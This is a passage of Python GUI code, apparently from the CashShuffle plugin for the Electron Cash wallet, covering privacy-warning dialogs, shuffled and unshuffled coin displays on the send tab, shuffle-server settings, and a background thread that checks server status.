ct += 1
setter(k)
if ct:
self.print_error("Found and removed {} deprecated keys from {}".format(ct, thing))
# counters: shuffle counter and session counter
@classmethod
def _increment_generic_counter(cls, window, key):
window.wallet.storage.put(key, cls._get_generic_counter(window, key) + 1)
@staticmethod
def _get_generic_counter(window, key):
try:
ctr = int(window.wallet.storage.get(key, 0))
except (ValueError, TypeError): # paranoia
# stored value must have not been an int. :(
ctr = 0
return ctr
@classmethod
def _increment_session_counter(cls, window):
cls._increment_generic_counter(window, ConfKeys.PerWallet.SESSION_COUNTER)
@classmethod
def _get_session_counter(cls, window):
return cls._get_generic_counter(window, ConfKeys.PerWallet.SESSION_COUNTER)
@classmethod
def _increment_shuffle_counter(cls, window):
cls._increment_generic_counter(window, ConfKeys.PerWallet.SHUFFLE_COUNTER)
@classmethod
def _get_shuffle_counter(cls, window):
return cls._get_generic_counter(window, ConfKeys.PerWallet.SHUFFLE_COUNTER)
# /counters
def warn_if_shuffle_disable_not_ok(self, window, *, msg=None):
'''
Determine if disabling (or not re-enabling in the case of a pw dialog
cancel) of cash shuffle is ok for this wallet.
This method may block the GUI with a local modal dialog asking the user
if they are sure.
In the future, we may also put code to say "shuffles pending, please
wait..." in a cancellable progress-type dialog.
Returns True if calling code should proceed with disable action.
'''
# Note -- window may not necessarily be shuffle patched as this
# may be called from the password dialog
noprompt = window.wallet.storage.get(ConfKeys.PerWallet.DISABLE_NAGGER_NOPROMPT, False)
if not noprompt and type(self)._get_session_counter(window) > 0:
if msg is None:
msg = _('You are now <i>disabling</i> CashShuffle for this wallet. Are you sure?')
ans, chk = window.question(
msg=msg,
informative_text=_('Spending and linking coins with CashShuffle disabled may compromise your privacy for both shuffled and unshuffled coins in this wallet.'),
title=_("Privacy Warning"), rich_text=True,
checkbox_text=_("Never ask for this wallet"), checkbox_ischecked=noprompt,
)
if chk:
window.wallet.storage.put(ConfKeys.PerWallet.DISABLE_NAGGER_NOPROMPT, bool(chk))
return bool(ans)
return True
class SendTabExtraDisabled(QFrame, PrintError):
''' Implements a Widget that appears in the main_window 'send tab' to inform the user CashShuffle was disabled for this wallet '''
def __init__(self, window):
self.send_tab = window.send_tab
self.send_grid = window.send_grid
self.wallet = window.wallet
self.window = window
super().__init__(window.send_tab)
self.send_grid.addWidget(self, 0, 0, 1, self.send_grid.columnCount()) # just our luck. row 0 is free!
self.setup()
def setup(self):
self.setFrameStyle(QFrame.StyledPanel|QFrame.Sunken)
l = QGridLayout(self)
l.setVerticalSpacing(6)
l.setHorizontalSpacing(30)
l.setContentsMargins(6, 6, 6, 6)
self.txt = "<big><b>{}</b></big> {}".format(_("CashShuffle Disabled"), _("Your shuffled and unshuffled coins can be mixed and spent together."))
self.msg = "{}\n\n{}\n\n{}".format(_("When CashShuffle is disabled, your privacy on the blockchain is reduced to traditional levels, and 'chainalysis' becomes easier (your transactions can be associated with one another)."),
_("This spending mode is the same as previous versions of Electron Cash, which did not offer CashShuffle."),
_("You may toggle CashShuffle back on at any time using the 'CashShuffle' icon in the status bar."))
self.titleLabel = HelpLabel(self.txt, self.msg)
self.titleLabel.setParent(self)
l.addWidget(self.titleLabel, 0, 1, 1, 4)
l.setAlignment(self.titleLabel, Qt.AlignLeft|Qt.AlignVCenter)
l.addItem(QSpacerItem(1, 1, QSizePolicy.MinimumExpanding, QSizePolicy.Fixed), 1, 5)
icon = FixedAspectRatioSvgWidget(75, ":icons/CashShuffleLogos/logo-vertical_grayed.svg")
icon.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
icon.setToolTip(_("CashShuffle Disabled"))
l.addWidget(icon, 0, 0, l.rowCount(), 1)
l.setSizeConstraint(QLayout.SetNoConstraint)
class SendTabExtra(QFrame, PrintError):
''' Implements a Widget that appears in the main_window 'send tab' to inform the user of shuffled coin status & totals '''
needRefreshSignal = pyqtSignal() # protocol thread uses this signal to tell us that amounts have changed
needWalletSaveSignal = pyqtSignal() # protocol thread uses this signal to tell us that the wallet should be saved to disk using storage.write
pixmap_cached = None # singleton gets initialized first time an instance of this class is constructed. Contains the cashshuffle_icon5.png scaled to 125px width
def __init__(self, window):
self.send_tab = window.send_tab
self.send_grid = window.send_grid
self.wallet = window.wallet
self.window = window
super().__init__(window.send_tab)
self.send_grid.addWidget(self, 0, 0, 1, self.send_grid.columnCount()) # just our luck. row 0 is free!
self.setup()
def setup(self):
self.setFrameStyle(QFrame.StyledPanel|QFrame.Sunken)
l = QGridLayout(self)
l.setVerticalSpacing(6)
l.setHorizontalSpacing(30)
l.setContentsMargins(6, 12, 6, 12)
self.msg = "{}\n\n{}\n\n{}".format(_("For improved privacy, shuffled coins and unshuffled coins cannot be sent together in the same transaction when CashShuffle is enabled."),
_("You may switch between shuffled and unshuffled spending using the radio buttons on the right."),
_("If insufficient shuffled funds are available, you can wait a few minutes as coins are shuffled in the background."))
self.msg2 = "{}\n\n{}\n\n{}".format(_("For improved privacy, shuffled coins and unshuffled coins cannot be sent together in the same transaction when CashShuffle is enabled."),
_("You may switch between shuffled and unshuffled spending using the radio buttons on the right."),
_("Some of your unshuffled funds may be temporarily locked while the shuffle operation is performed. If you want to unlock these funds immediately, you can use the 'Pause Shuffling' button to do so."))
self.titleLabel = HelpLabel("", "") # Will be initialized by self.onSpendRadio() below
self.titleLabel.setParent(self)
l.addWidget(self.titleLabel, 0, 1, 1, 4)
self.spendButtons = QButtonGroup(self)
# Shuffled
self.shufLabel = HelpLabel(_("Shuffled available:"), self.msg)
m = _("Shuffled (private) funds")
self.shufLabel.setToolTip(m)
self.shufLabel.setParent(self)
l.addWidget(self.shufLabel, 1, 1)
self.amountLabel = QLabel("", self); self.amountLabel.setToolTip(m)
l.addWidget(self.amountLabel, 1, 2)
self.numCoinsLabel = QLabel("", self); self.numCoinsLabel.setToolTip(m)
l.addWidget(self.numCoinsLabel, 1, 3)
self.spendShuffled = QRadioButton(_("Spend Shuffled"), self); self.spendShuffled.setToolTip(_("Spend only your shuffled (private) coins"))
l.addWidget(self.spendShuffled, 1, 4)
self.spendButtons.addButton(self.spendShuffled)
# Unshuffled
self.unshufLabel = HelpLabel(_("Unshuffled available:"), self.msg2)
m = _("Funds that are not yet shuffled")
self.unshufLabel.setToolTip(m)
self.unshufLabel.setParent(self)
l.addWidget(self.unshufLabel, 2, 1)
self.amountLabelUnshuf = QLabel("", self); self.amountLabelUnshuf.setToolTip(m)
l.addWidget(self.amountLabelUnshuf, 2, 2)
self.numCoinsLabelUnshuf = QLabel("", self); self.numCoinsLabelUnshuf.setToolTip(m)
l.addWidget(self.numCoinsLabelUnshuf, 2, 3)
self.spendUnshuffled = QRadioButton(_("Spend Unshuffled"), self); self.spendUnshuffled.setToolTip(_("Spend only your unshuffled coins"))
l.addWidget(self.spendUnshuffled, 2, 4)
self.spendButtons.addButton(self.spendUnshuffled)
self.spendShuffled.setChecked(True)
# In Progress
self.msg3 = _("Funds that are busy being shuffled are not available for spending until they are shuffled. To spend these funds immediately, use the 'Pause Shuffling' button to temporarily suspend CashShuffle.")
self.busyLbl = HelpLabel(_("Busy shuffling:"), self.msg3)
self.busyLbl.setParent(self)
m = _("Funds currently being shuffled")
self.busyLbl.setToolTip(m)
l.addWidget(self.busyLbl, 3, 1)
self.amountLabelBusy = QLabel("", self); self.amountLabelBusy.setToolTip(m)
l.addWidget(self.amountLabelBusy, 3, 2)
self.numCoinsLabelBusy = QLabel("", self); self.numCoinsLabelBusy.setToolTip(m)
l.addWidget(self.numCoinsLabelBusy, 3, 3)
self.pauseBut = QPushButton("", self) # Button text filled in by refresh() call
self.pauseBut.setDefault(False); self.pauseBut.setAutoDefault(False); self.pauseBut.setCheckable(True)
self.pauseBut.setToolTip(_("Pause/Unpause the background shuffle process (frees up 'busy' coins for spending)"))
l.addWidget(self.pauseBut, 3, 4)
l.setAlignment(self.titleLabel, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabel, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabelUnshuf, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabelBusy, Qt.AlignLeft)
l.addItem(QSpacerItem(1, 1, QSizePolicy.MinimumExpanding, QSizePolicy.Fixed), 1, 5)
icon = FixedAspectRatioSvgWidget(125, ":icons/CashShuffleLogos/logo-vertical.svg")
icon.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
l.addWidget(icon, 0, 0, l.rowCount(), 1)
l.setSizeConstraint(QLayout.SetNoConstraint)
self.spendButtons.buttonClicked.connect(self.onSpendRadio)
self.window.history_updated_signal.connect(self.refresh)
self.needRefreshSignal.connect(self.refresh)
self.needRefreshSignal.connect(self.window.update_fee)
self.needWalletSaveSignal.connect(self.wallet.storage.write)
self.spendButtons.buttonClicked.connect(lambda x="ignored": self.refresh())
self.pauseBut.clicked.connect(self.onClickedPause)
self.onSpendRadio() # sets up the title label and possibly warns user if starting up in "spend unshuffled" mode
def onSpendRadio(self, ignored = None):
which = self.spendingMode()
if which == self.SpendingModeShuffled:
self.titleLabel.setText("<big><b>{}</b></big> ({})"
.format(_("CashShuffle Enabled"), _("Only <b>shuffled</b> funds will be sent")))
self.titleLabel.help_text = self.msg
self.forceUnpause()
#self.pauseBut.setDisabled(True)
elif which == self.SpendingModeUnshuffled:
self.titleLabel.setText("<big><b>{}</b></big> ({})"
.format(_("CashShuffle Enabled"), _("Only <i>unshuffled</i> funds will be sent")))
self.titleLabel.help_text = self.msg2
#self.pauseBut.setEnabled(bool(self.window.background_process and not self.window.background_process.is_offline_mode()))
noprompt = self.wallet.storage.get(ConfKeys.PerWallet.SPEND_UNSHUFFLED_NAGGER_NOPROMPT, False)
if not noprompt:
ans, chk = self.window.question(
msg=_('You are now spending <b><i>unshuffled</i></b> coins. Are you sure?'),
informative_text=_('Spending and linking these coins may compromise your privacy not only for new received coins, but also for your past spending of shuffled coins.'),
title=_("Privacy Warning"), rich_text=True,
checkbox_text=_("Never ask for this wallet"), checkbox_ischecked=noprompt,
)
if chk:
self.wallet.storage.put(ConfKeys.PerWallet.SPEND_UNSHUFFLED_NAGGER_NOPROMPT, bool(chk))
if not ans:
self.spendShuffled.animateClick()
return
self.window.update_fee()
def onClickedPause(self, b):
if self.window.background_process:
self.window.background_process.set_paused(b)
# Note: GUI refresh() wil later also set this string but we set it immediately here so UI feel peppier
self.pauseBut.setText(_("Pause Shuffling") if not b else _("Shuffling Paused"))
self.window.utxo_list.update()
def do_clear(self): # called by plugin hook do_clear()
self.forceUnpause()
self.refresh()
def forceUnpause(self):
if self.window.background_process:
self.window.background_process.set_paused(False)
self.pauseBut.setChecked(False)
self.pauseBut.setText(_("Pause Shuffling"))
def showEvent(self, e):
super().showEvent(e)
self.refresh()
_templates = tuple()
@rate_limited(0.250)
def refresh(self, shuf=None, unshuf=None, inprog=None, usas=None):
if not hasattr(self.window.wallet, '_shuffle_patched_'):
# this can happen if this timer fires after the wallet was "un-monkey-patched". It's the price we pay for @rate_limied. :)
return
if shuf is None or unshuf is None or inprog is None or usas is None:
shuf, unshuf, inprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(self.window.wallet)
amount, n, amountUnshuf, nUnshuf, amountInProg, nInProg = *shuf, *unshuf, *inprog
amount += usas[0]
n += usas[1]
# TODO: handle usas separately?
if not __class__._templates: # lazy init
__class__._templates = (
# bold [0]
( # [0] is singular [1] is plural
( "<b>{}</b> {}", ("<b>{}</b> %s <small>(%s)</small>"%(_("Coin"),_("UTXO"))) ),
( "<b>{}</b> {}", ("<b>{}</b> %s <small>(%s)</small>"%(_("Coins"),_("UTXOs"))) )
),
# normal [1]
( #[0] singular, [1] plural
( "{} {}", ("{} %s <small>(%s)</small>"%(_("Coin"),_("UTXO"))) ), # normal singular
( "{} {}", ("{} %s <small>(%s)</small>"%(_("Coins"),_("UTXOs"))) ) # normal text plural template
)
)
bt = self._templates[0] # bold text templates (sub-list [0]==singular [1]==plural)
nt = self._templates[1] # normal text templates (sub-list [0]==singular [1]==plural)
mode = self.spendingMode()
tshuf = (bt if mode == self.SpendingModeShuffled else nt)[0 if n == 1 else 1] # select a template based on mode & plurality
tunshuf = (bt if mode == self.SpendingModeUnshuffled else nt)[0 if nUnshuf == 1 else 1] # select a template based on mode
self.amountLabel.setText(tshuf[0].format(self.window.format_amount(amount).strip(), self.window.base_unit()))
self.numCoinsLabel.setText(tshuf[1].format(n))
self.amountLabelUnshuf.setText(tunshuf[0].format(self.window.format_amount(amountUnshuf).strip(), self.window.base_unit()))
self.numCoinsLabelUnshuf.setText(tunshuf[1].format(nUnshuf))
tbusy = nt[0 if nInProg == 1 else 1]
self.amountLabelBusy.setText(tbusy[0].format(self.window.format_amount(amountInProg).strip(), self.window.base_unit()))
self.numCoinsLabelBusy.setText(tbusy[1].format(nInProg))
f = self.spendShuffled.font()
f.setBold(bool(mode == self.SpendingModeShuffled))
self.spendShuffled.setFont(f)
f = self.spendUnshuffled.font()
f.setBold(bool(mode == self.SpendingModeUnshuffled))
self.spendUnshuffled.setFont(f)
if self.window.background_process:
is_paused = self.window.background_process.get_paused()
self.pauseBut.setChecked(is_paused)
else:
self.pauseBut.setChecked(False)
self.pauseBut.setText(_("Pause Shuffling") if not self.pauseBut.isChecked() else _("Shuffling Paused"))
self.pauseBut.setEnabled(bool(self.window.background_process #and mode == self.SpendingModeUnshuffled
and not self.window.background_process.is_offline_mode()))
SpendingModeShuffled = 1
SpendingModeUnshuffled = 2
SpendingModeUnknown = 0
def spendingMode(self):
''' Returns one o the SpendingMode* class constants above '''
if hasattr(self.wallet, "_shuffle_patched_"):
which = self.spendButtons.checkedButton()
if which is self.spendShuffled: return self.SpendingModeShuffled
elif which is self.spendUnshuffled: return self.SpendingModeUnshuffled
return self.SpendingModeUnknown
def setSpendingMode(self, spendMode):
but2Check = None
if spendMode == self.SpendingModeUnshuffled and not self.spendUnshuffled.isChecked():
but2Check = self.spendUnshuffled
elif spendMode == self.SpendingModeShuffled and not self.spendShuffled.isChecked():
but2Check = self.spendShuffled
if but2Check:
but2Check.setChecked(True)
self.onSpendRadio() # slot won't get called from setting radio buttons programmaticallys, so we force-call the slot
class NetworkCheckerDelegateMixin:
'''Abstract base for classes receiving data from the NetworkChecker.
SettingsDialog implements this, as does the PoolsWindow.'''
settingsChanged = pyqtSignal(dict)
statusChanged = pyqtSignal(dict)
class SettingsDialogMixin(NetworkCheckerDelegateMixin, PrintError):
''' Abstrat Base class -- do not instantiate this as it will raise errors
because the pyqtSignal cannot be bound to a non-QObject.
Instead, use SettingsDialog and/or SettingsTab which interit from this and
are proper QObject subclasses.
Also call __init__ on the QObject/QWidget first before calling this
class's __init__ method.'''
# from base: settingsChanged = pyqtSignal(dict)
# from base: statusChanged = pyqtSignal(dict)
formChanged = pyqtSignal()
_DEFAULT_HOST_SUBSTR = "shuffle.servo.cash" # on fresh install, prefer this server as default (substring match)
def __init__(self, config, message=None):
assert config
assert isinstance(self, QWidget)
self.config = config
self.networkChecker = None
self.serverOk = None
self._vpLastStatus = dict()
self.setup(message)
#DEBUG
destroyed_print_error(self)
def showEvent(self, e):
super().showEvent(e)
self.startNetworkChecker()
def hideEvent(self, e):
super().hideEvent(e)
self.stopNetworkChecker()
def closeEvent(self, e):
super().closeEvent(e)
def from_combobox(self):
d = self.cb.currentData()
if isinstance(d, dict):
host, info, ssl = d.get('server'), d.get('info'), d.get('ssl')
self.le.setText(host)
self.sb.setValue(info)
self.chk.setChecked(ssl)
en = self.cb.currentIndex() == self.cb.count()-1
self.le.setEnabled(en); self.sb.setEnabled(en); self.chk.setEnabled(en)
self.formChanged.emit()
def get_form(self):
ret = {
'server': self.le.text(),
'info' : self.sb.value(),
'ssl' : self.chk.isChecked()
}
if self.isVisible():
customIdx = self.cb.count()-1
if self.cb.currentIndex() == customIdx:
# "remember" what they typed into the custom area..
d = self.cb.itemData(customIdx)
if ret != d:
self.cb.setItemData(customIdx, ret)
return ret
def setup_combo_box(self, selected = {}):
def load_servers(fname):
r = {}
try:
zips = __file__.find(".zip")
if zips == -1:
with open(os.path.join(os.path.dirname(__file__), fname), 'r') as f:
r = json.loads(f.read())
else:
from zipfile import ZipFile
zip_file = ZipFile(__file__[: zips + 4])
with zip_file.open("shuffle/" + fname) as f:
r = json.loads(f.read().decode())
except:
self.print_error("Error loading server list from {}: {}", fname, str(sys.exc_info()[1]))
return r
# /
servers = load_servers("servers.json")
selIdx, defIdx = (-1,)*2
self.cb.clear()
for host, d0 in sorted(servers.items()):
d = d0.copy()
d['server'] = host
item = _elide(host) + (' [ssl]' if d['ssl'] else '')
self.cb.addItem(item, d)
if selected and selected == d:
selIdx = self.cb.count()-1
elif defIdx < 0 and self._DEFAULT_HOST_SUBSTR in host:
defIdx = self.cb.count()-1
self.cb.addItem(_("(Custom)"))
if selIdx > -1:
self.cb.setCurrentIndex(selIdx)
elif selected and len(selected) == 3:
custIdx = self.cb.count()-1
self.cb.setItemData(custIdx, selected.copy())
self.cb.setCurrentIndex(custIdx)
elif defIdx > -1:
self.cb.setCurrentIndex(defIdx)
def refreshFromSettings(self):
selected = Plugin.get_and_validate_network_settings(self.config)
self.setup_combo_box(selected = selected)
return selected
def setup(self, msg):
vbox = QVBoxLayout(self)
if not msg:
msg = _("Choose a CashShuffle server or enter a custom server.\nChanges will require the CashShuffle plugin to restart.")
l = QLabel(msg + "\n")
l.setAlignment(Qt.AlignHCenter|Qt.AlignTop)
vbox.addWidget(l)
grid = QGridLayout()
vbox.addLayout(grid)
self.cb = QComboBox(self)
self.refreshFromSettings()
grid.addWidget(QLabel(_('Servers'), self), 0, 0)
grid.addWidget(self.cb, 0, 1)
grid.addWidget(QLabel(_("Host"), self), 1, 0)
hbox = QHBoxLayout(); grid.addLayout(hbox, 1, 1, 1, 2); grid.setColumnStretch(2, 1)
self.le = QLineEdit(self); hbox.addWidget(self.le)
self.le.textEdited.connect(lambda x='ignored': self.formChanged.emit())
hbox.addWidget(QLabel(_("P:"), self))
self.sb = QSpinBox(self); self.sb.setRange(1, 65535); hbox.addWidget(self.sb)
self.sb.valueChanged.connect(lambda x='ignored': self.formChanged.emit())
self.chk = QCheckBox(_("SSL"), self); hbox.addWidget(self.chk)
self.chk.toggled.connect(lambda x='ignored': self.formChanged.emit())
self.cb.currentIndexChanged.connect(lambda x='ignored': self.from_combobox())
self.from_combobox()
hbox2 = QHBoxLayout()
vbox.addLayout(hbox2)
self.statusGB = QGroupBox(_("Status"), self)
hbox2.addWidget(self.statusGB)
vbox2 = QVBoxLayout(self.statusGB)
self.statusLabel = QLabel("", self.statusGB)
self.statusLabel.setMinimumHeight(50)
self.statusLabel.setAlignment(Qt.AlignAbsolute|Qt.AlignTop)
vbox2.addWidget(self.statusLabel)
# add the "Coin selection settings..." link
self.coinSelectionSettingsLabel = QLabel("<a href='dummy'>{}</a>".format(_("Coin selection settings...")))
self.coinSelectionSettingsLabel.linkActivated.connect(self.onCoinSelectionSettingsClick)
vbox.addWidget(self.coinSelectionSettingsLabel)
self.vbox = vbox
if not isinstance(self, SettingsTab):
# add close button only if not SettingsTab
vbox.addStretch()
buttons = Buttons(CloseButton(self), OkButton(self))
vbox.addLayout(buttons)
# NEW! add the "View pools..." button to the bottom
vbox = self.statusGB.layout()
hbox = QHBoxLayout()
hbox.addStretch(1)
self.poolsBut = QPushButton(_("View pools..."))
f = self.poolsBut.font(); f.setPointSize(f.pointSize()-(2 if sys.platform=='darwin' else 1)); self.poolsBut.setFont(f)
hbox.addWidget(self.poolsBut)
hbox.addStretch(1)
vbox.addLayout(hbox)
self.statusChanged.connect(self._vpGotStatus)
self.poolsBut.setEnabled(False)
self.poolsBut.clicked.connect(self._vpOnPoolsBut, Qt.DirectConnection)
def kill(self):
self.stopNetworkChecker()
def onCoinSelectionSettingsClick(self, ignored):
win = CoinSelectionSettingsWindow()
win.exec_()
win.deleteLater()
if self.window().isVisible():
self.window().raise_()
self.activateWindow()
def _vpGotStatus(self, sdict):
self._vpLastStatus = sdict.copy()
if sdict.get('status') in (_("Ok"), _("Banned")):
self.poolsBut.setEnabled(True)
else:
self.poolsBut.setEnabled(False)
def _vpOnPoolsBut(self):
w = PoolsWinMgr.show(self._vpLastStatus, self.get_form(), self.config, modal=True)
def _on_statusChanged(self, d):
red, blue, green = "red", "blue", "green"
try: red, blue, green = ColorScheme.RED._get_color(0), ColorScheme.BLUE._get_color(0), ColorScheme.GREEN._get_color(0)
except AttributeError: pass
#self.print_error("status changed", d)
if not d: # Empty dict means we are connecting
self.serverOk = None
self.statusLabel.setText("<font color=\"{}\"><i>{}</i></font>".format(blue, _("Checking server...")))
return
if d.get('failed'): # Dict with only 1 key, 'failed' means connecton failed
reason = d['failed']
if reason == 'offline_mode':
reason = _("Electron Cash is in offline mode.")
elif reason == 'bad':
reason = _("Server is misconfigured")
elif reason == 'ssl':
reason = _("Failed to verify SSL certificate")
else:
reason = _("Connection failure")
self.statusLabel.setText("<b>" + _("Status") + ":</b> <font color=\"{}\">{}</font>".format(red, reason))
self.serverOk = False
return
# any other case has all the below keys defined
self.serverOk = d['status'] == _('Ok')
self.statusLabel.setText(
'''
<b>{}:</b> <i>{}</i><br>
<b>{}:</b> <font color="{}">{}</font> {} {}
<small>{}: {} {}: {} {}: {}</small>
'''
.format(_('Server'), _elide(d['host'], maxlen=40, startlen=12),
_('Status'), green if not d['banned'] else "#dd4444", d['status'], " <b>{}</b> {}".format(_("Ban score:"),d['banScore']) if d['banScore'] else '', '<br>' if d['banScore'] else '',
_('Pool size'), d['poolSize'],
_('Connections'),
d['connections'],
_('Active pools'), d['pools'])
)
def _on_formChange(self):
try:
#self.print_error("onFormChange")
d = self.get_form()
self.settingsChanged.emit(d)
except RuntimeError as e:
# Paranoia guard against C++ object deleted exception
# (we may get called from a QTimer.singleShot below)
if 'C++' not in str(e).upper():
raise
def startNetworkChecker(self):
if self.networkChecker: return
self.networkChecker = NetworkChecker(self)
self.statusChanged.connect(self._on_statusChanged, Qt.QueuedConnection)
self.formChanged.connect(self._on_formChange, Qt.QueuedConnection)
self.print_error("Starting network checker...")
self.networkChecker.start()
QTimer.singleShot(100, self._on_formChange) # kicks off the network checker by sending it new settings
def stopNetworkChecker(self):
if self.networkChecker:
try: self.statusChanged.disconnect(self._on_statusChanged)
except TypeError: pass # not connected
try: self.statusChanged.disconnect(self._on_formChange)
except TypeError: pass # not connected
self.networkChecker.stop()
self.networkChecker = None
self.print_error("Stopped network checker.")
# /
# /SettingsDialogMixin
class SettingsDialog(SettingsDialogMixin, AppModalDialog):
''' Concrete class for the stand-alone Settings window you get when
you right-click and get "CashShuffle Settings..." from the CashShuffle status
button context menu '''
def __init__(self, title, config, message=None, windowFlags=None):
AppModalDialog.__init__(self, title=title, windowFlags=windowFlags, parent=None)
self.setMinimumSize(400, 350)
SettingsDialogMixin.__init__(self, config=config, message=message)
# /SettingsDialog
class SettingsTab(SettingsDialogMixin, QWidget):
# Apparently if you inherit from a C++ object first it creates problems.
# You are supposed to inherit from the mixins in Python first, then the
# Qt C++ object last. Who knew. All of Electron Cash codebase apparently
# is doing it wrong.
# See this: http://python.6.x6.nabble.com/Issue-with-multiple-inheritance-td5207771.html
# So we inherit from our mixin first. (Note I had problems with overriding
# __init__ here and Qt's C++ calling the wrong init here.)
applyChanges = pyqtSignal(object)
def __init__(self, parent, config, message=None):
QWidget.__init__(self, parent=parent)
SettingsDialogMixin.__init__(self, config=config, message=message)
# add the "Apply" button to the bottom
self.apply = QPushButton(_("Apply"), self)
hbox = QHBoxLayout()
self.vbox.addLayout(hbox)
self.vbox.addStretch()
hbox.addStretch(1)
hbox.addWidget(self.apply)
self.apply.clicked.connect(self._re_emit_applyChanges)
def _re_emit_applyChanges(self):
self.applyChanges.emit(self)
def _vpOnPoolsBut(self):
w = PoolsWinMgr.show(self._vpLastStatus, self.get_form(), self.config, modal=False, parent_window=self)
# /SettingsTab
class NetworkChecker(PrintError):
''' Runs in a separate thread, checks the server automatically when the settings form changes
and publishes results to GUI thread. '''
pollTimeSecs = 15.0
checkShufflePort = True
verifySSL = True # if true, verify the ssl socket of the shuffle port when checking the server
def __init__(self, parent):
assert isinstance(parent, NetworkCheckerDelegateMixin), "Parent to NetworkChecker must be a NetworkCheckerDelegateMixin"
self.weakParent = Weak.ref(parent)
self.q = queue.Queue()
self.thread = threading.Thread(target=self.thread_func, daemon=True)
self._please_stop = False
self._sock = None
self._update_ct = 0
parent.settingsChanged.connect(self._on_settings_changed, Qt.QueuedConnection)
self.print_error("created")
finalization_print_error(self)
def stop(self):
if self.thread.is_alive():
self._please_stop = True
self.q.put(None) # signal to thread to die
try: self._sock.close() # force close thread
except: pass
self.thread.join(timeout=15.0) # wait for thread to finish
if self.thread.is_alive():
# This should never happen
self.print_error("*** WARNING: Waited for thread to exit for 15.0 seconds, but it is still running! FIXME!")
def start(self):
if not self.thread.is_alive():
self.q.put(None) # paranoia just in case
self.q = queue.Queue() # clear the queue
self._please_stop = False
self.thread.start() # this raises RuntimeError if called more than once.
def _on_settings_changed(self, d):
self._update_ct = 0 # reset ctr for these settings. ctr = 0 causes us to tell gui to draw the "Connecting, please wait..." text
self.q.put(d.copy()) # notify thread which waits on this q
def _wait_drain_q(self, last_settings):
q = self.q
try:
res = None
try:
# Drain queue to get latest settings
while True:
# keep reading from the queue until it's empty
res = q.get_nowait()
if res is None:
# we got a None, return early -- this indicates abort thread
return res
except queue.Empty:
''' No settings were waiting in queue.. move to blocking
operation '''
if self._please_stop:
return # indicate stop
if res is not None:
# we had a result, return
return res
# no result from Queue, block for pollTimeSecs
return q.get(timeout=self.pollTimeSecs)
except queue.Empty:
# no result in pollTimeSecs, return last settings value
return last_settings
def thread_func(self):
try:
self.print_error("thread entered")
settings = dict()
while True:
settings = self._wait_drain_q(settings)
if settings is None:
return # exit thread if we got a None
if settings:
self._on_update_status(settings)
finally:
self.print_error("thread exiting")
def _emit_status_changed(self, d):
self.weakParent() and self.weakParent().statusChanged.emit(d)
def _on_update_status(self, d):
d = d.copy()
#self.print_error("updateStatus", d) # XXX
is_bad_server, is_bad_ssl, is_offline_mode = False, False, False
try:
if not Network.get_instance():
is_offline_mode = True
raise RuntimeError("No network")
if self._update_ct == 0:
self._emit_status_changed(dict()) # tells GUI we are "connecting..."
self._update_ct += 1
port, poolSize, connections, pools, banScore, banned = query_server_for_stats(d['server'], d['info'], d['ssl'])
if self._please_stop:
return
if poolSize < 3:
# hard-coded -- do not accept servers with poolSize < 3
is_bad_server = True
raise RuntimeError("PoolSize must be >=3, got: {}".format(poolSize))
if d['ssl'] and self.verifySSL and not verify_ssl_socket(d['server'], int(port), timeout=7.5):
is_bad_ssl = True
raise RuntimeError("Could not verify SSL server certificate.")
if self._please_stop:
return
if self.checkShufflePort:
self._sock = socket.create_connection((d['server'], port), 5.0) # test connectivity to port
self._sock.close()
self._sock = None
if self._please_stop:
return
self._emit_status_changed({
'host' : d['server'],
'status' : _('Ok') if not banned else _('Banned'),
'poolSize' : str(poolSize),
'connections' : str(connections),
'pools' : str(len(pools)),
'poolsList' : pools,
'banScore' : banScore,
'banned' : banned,
'name' : d['server'] + ":" + str(d['info']),
'info' : d['info'],
'ssl' : d['ssl'],
})
except Exception as e:
# DEBUG
#import traceback
#traceback.print_exc()
# /DEBUG
self.print_error("exception on connect:",str(e))
if is_offline_mode:
self._emit_status_changed({'failed' : 'offline_mode'})
elif is_bad_ssl:
self._emit_status_changed({'failed' : 'ssl'})
elif is_bad_server:
self._emit_status_changed({'failed' : 'bad'})
else:
self._emit_status_changed({'failed' : 'failed'})
# / NetworkChecker
class PoolsWinMgr(QObject, PrintError):
simpleChangedSig = pyqtSignal()
_instance = None
def __init__(self):
assert not PoolsWinMgr._instance, "More than 1 PoolsWinMgr instance detected -- PoolsWinMgr is a singleton!"
super().__init__()
PoolsWinMgr._instance = self
self.poolWindows = {}
self.print_error("created")
#DEBUG
destroyed_print_error(self)
def __del__(self):
stale = True
if PoolsWinMgr._instance is self:
PoolsWinMgr._instance = None
stale = False
print_error("[{}] finalized{}".format(__class__.__name__, " (stale instance)" if stale else ''))
if hasattr(super(), '__del__'):
super().__del__()
#public methods
@classmethod
def instance(cls, create_if_missing=True):
if not cls._instance and create_if_missing:
cls._instance = cls()
return cls._instance
@classmethod
def killInstance(cls):
if cls._instance:
cls._instance._killAll()
cls._instance.deleteLater()
cls._instance = None
@classmethod
def closeAll(cls):
''' This implicitly will also delete all the windows when event loop next runs. '''
app = QApplication.instance()
if app:
poolWins = [w for w in app.topLevelWidgets() if isinstance(w, PoolsWindow)]
for w in poolWins:
w.close()
@classmethod
def show(cls, stats_dict, network_settings, config, *, parent_window=None, modal=False):
mgr = cls.instance()
return mgr._createOrShow(stats_dict, network_settings, config, parent_window=parent_window, modal=modal)
#private methods
def _createOrShow(self, stats_dict, network_settings, config, *, parent_window=None, modal=False):
d = stats_dict
if not isinstance(d, dict) or not d or not network_settings:
self.print_error("createOrShow: got invalid args.. will not create/show a window")
return
name = d['name']
w = self.poolWindows.get(name)
if w and ((modal and w.windowModality() != Qt.ApplicationModal)
or (not modal and w.windowModality() != Qt.NonModal)):
self.print_error("Found extant window {} but modal spec != extant modal, killing...".format(name))
self._kill(name)
w = None
if not w:
self.print_error("Creating", name)
w = PoolsWindow(config, parent_window, d, network_settings, modal=modal)
self.poolWindows[name] = w
w.closed.connect(self._kill) # clean-up instance
else:
self.print_error("Updating", name)
w.weakParent = Weak.ref(parent_window) if parent_window else None
w.settings = network_settings
w.settingsChanged.emit(w.settings)
if w.isMinimized():
w.showNormal()
w.show(); w.raise_(); w.activateWindow()
return w
def _kill(self, name):
window = self.poolWindows.pop(name) # will actually delete the QWidget instance.
window.stopNetworkChecker()
window.deleteLater() # force Qt delete. This call may be superfluous
